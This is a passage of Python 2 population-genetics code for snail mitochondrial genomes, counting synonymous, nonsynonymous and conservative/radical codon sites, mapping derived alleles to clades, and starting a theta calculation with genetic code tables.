):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
totalSynSites = 0.0
totalNonsynSites = 0.0
totalC1Sites = 0.0
totalR1Sites = 0.0
totalC2Sites = 0.0
totalR2Sites = 0.0
totalC3Sites = 0.0
totalR3Sites = 0.0
totalC4Sites = 0.0
totalR4Sites = 0.0
totalC5Sites = 0.0
totalR5Sites = 0.0
totalC6Sites = 0.0
totalR6Sites = 0.0
totalC7Sites = 0.0
totalR7Sites = 0.0
codonNum = 0
for codon in codonList:
if 'N' in codon or '-' in codon:
totalSynSites += 0.729166667
totalNonsynSites += 2.270833333
totalC1Sites += 1.395833333
totalR1Sites += 0.875
totalC2Sites += 1.270833333
totalR2Sites += 1
totalC3Sites += 0.708333333
totalR3Sites += 1.5625
totalC4Sites += 0.895833333
totalR4Sites += 1.375
totalC5Sites += 1.0625
totalR5Sites += 1.208333333
totalC6Sites += 0.854166667
totalR6Sites += 1.416666667
totalC7Sites += 0.8125
totalR7Sites += 1.458333333
else:
currS = 0.0
currN = 0.0
currC1 = 0.0
currC2 = 0.0
currC3 = 0.0
currC4 = 0.0
currC5 = 0.0
currC6 = 0.0
currC7 = 0.0
currR1 = 0.0
currR2 = 0.0
currR3 = 0.0
currR4 = 0.0
currR5 = 0.0
currR6 = 0.0
currR7 = 0.0
site1 = codon[0]
site2 = codon[1]
site3 = codon[2]
if site1 == 'A':
mut1 = 'C' + site2 + site3
mut2 = 'G' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'C':
mut1 = 'A' + site2 + site3
mut2 = 'G' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'G':
mut1 = 'A' + site2 + site3
mut2 = 'C' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'T':
mut1 = 'A' + site2 + site3
mut2 = 'C' + site2 + site3
mut3 = 'G' + site2 + site3
if site2 == 'A':
mut4 = site1 + 'C' + site3
mut5 = site1 + 'G' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'C':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'G' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'G':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'C' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'T':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'C' + site3
mut6 = site1 + 'G' + site3
if site3 == 'A':
mut7 = site1 + site2 + 'C'
mut8 = site1 + site2 + 'G'
mut9 = site1 + site2 + 'T'
elif site3 == 'C':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'G'
mut9 = site1 + site2 + 'T'
elif site3 == 'G':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'C'
mut9 = site1 + site2 + 'T'
elif site3 == 'T':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'C'
mut9 = site1 + site2 + 'G'
if codonNum == 0:
aaList = []
if codon in startCodons:
currAA = 'M'
else:
currAA = geneticCode[codon]
if mut1 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut1])
if mut2 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut2])
if mut3 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut3])
if mut4 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut4])
if mut5 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut5])
if mut6 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut6])
if mut7 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut7])
if mut8 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut8])
if mut9 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut9])
else:
aaList = [geneticCode[mut1],geneticCode[mut2],geneticCode[mut3], geneticCode[mut4],geneticCode[mut5],geneticCode[mut6],geneticCode[mut7],geneticCode[mut8],geneticCode[mut9]]
currAA = geneticCode[codon]
for aa in aaList:
if aa == currAA:
currS += 1.0
else:
currN += 1.0
conRad1 = aaSchemeDict1[(currAA,aa)]
conRad2 = aaSchemeDict2[(currAA,aa)]
conRad3 = aaSchemeDict3[(currAA,aa)]
conRad4 = aaSchemeDict4[(currAA,aa)]
conRad5 = aaSchemeDict5[(currAA,aa)]
conRad6 = aaSchemeDict6[(currAA,aa)]
conRad7 = aaSchemeDict7[(currAA,aa)]
if conRad1 == 'R':
currR1 += 1
else:
currC1 += 1
if conRad2 == 'R':
currR2 += 1
else:
currC2 += 1
if conRad3 == 'R':
currR3 += 1
else:
currC3 += 1
if conRad4 == 'R':
currR4 += 1
else:
currC4 += 1
if conRad5 == 'R':
currR5 += 1
else:
currC5 += 1
if conRad6 == 'R':
currR6 += 1
else:
currC6 += 1
if conRad7 == 'R':
currR7 += 1
else:
currC7 += 1
currS /= 3.0
currN /= 3.0
currC1 /= 3.0
currC2 /= 3.0
currC3 /= 3.0
currC4 /= 3.0
currC5 /= 3.0
currC6 /= 3.0
currC7 /= 3.0
currR1 /= 3.0
currR2 /= 3.0
currR3 /= 3.0
currR4 /= 3.0
currR5 /= 3.0
currR6 /= 3.0
currR7 /= 3.0
totalSynSites += currS
totalNonsynSites += currN
totalC1Sites += currC1
totalR1Sites += currR1
totalC2Sites += currC2
totalR2Sites += currR2
totalC3Sites += currC3
totalR3Sites += currR3
totalC4Sites += currC4
totalR4Sites += currR4
totalC5Sites += currC5
totalR5Sites += currR5
totalC6Sites += currC6
totalR6Sites += currR6
totalC7Sites += currC7
totalR7Sites += currR7
codonNum += 1
return [totalSynSites,totalNonsynSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
def mapChanges(fasta):
cladeDict = {'A': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309', '>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'B': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'C': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC'], 'D': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36'], 'E': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid'], 'F': ['>$Waik37', '>$Waik372', '>$Tarawera'], 'G': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'H': ['>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'I': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'J': ['>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'K': ['>$clone_7', '>$DenmarkA', '>$Duluth'], 'L': ['>$clone_7', '>$DenmarkA'], 'M': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'N': ['>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'O': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n'], 'P': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'Q': ['>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'R': ['>$*Lady', '>$Grasmere_1_4n'], 'S': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'T': ['>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'U': ['>$McGregor', '>$Poerua_72_4n'], 'V': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n'], 'W': ['>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid'], 'X': ['>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n'], 'Y': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n'], 'Z': ['>$Heron2', '>$clone_1']}
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
cladeList = ['H','L','R','U','Z','F','K','N','Q','T','Y','X','E','J','W','D','C','B','V','S','P','O','M','I','G','A']
popList = []
sexList = []
outList = []
asexList = []
for seq in seqList:
if '$' in seq:
popList.append(seq)
if '*' in seq:
sexList.append(seq)
else:
asexList.append(seq)
else:
outList.append(seq)
outSeq = seqDict[outList[0]]
sys.stdout.write('Total Polymorphisms\nGene\tSite\tCodon\tLineages w/ Derived Allele\t# Individuals w/ derived allele\tAlleles\tP. est\n')
i = 0
while i < len(seqDict[seqList[0]]):
outNuc = outSeq[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i >= start and i <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
for seq in popList:
currSeq = seqDict[seq]
currNuc = currSeq[i]
if currNuc not in currAlleleDict and 'N' != currNuc and '-' != currNuc:
currAlleleDict[currNuc] = [seq]
currAlleleList.append(currNuc)
elif 'N' != currNuc and '-' != currNuc:
currList = currAlleleDict[currNuc]
currList.append(seq)
currAlleleDict[currNuc] = currList
if len(currAlleleDict) > 1:
for nuc in currAlleleList:
if nuc != outNuc:
currCladeList = cladeList
currList = currAlleleDict[nuc]
for group in cladeList:
compClade = cladeDict[group]
removeClade = False
for lineage in currList:
if lineage not in compClade:
removeClade = True
if removeClade == True:
currCladeList.remove(group)
print currCladeList
if len(currAlleleDict[nuc]) > 1:
sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i*3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc)
for clade in currCladeList:
sys.stdout.write('\t' + str(cladeDict[clade]))
sys.stdout.write('\n')
else:
sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i*3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc + '\n')
i += 1
def aN(N):
aN = 0.0
i = 1
while i < N:
aN += 1.0/i
i += 1
return aN
def thetaU(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 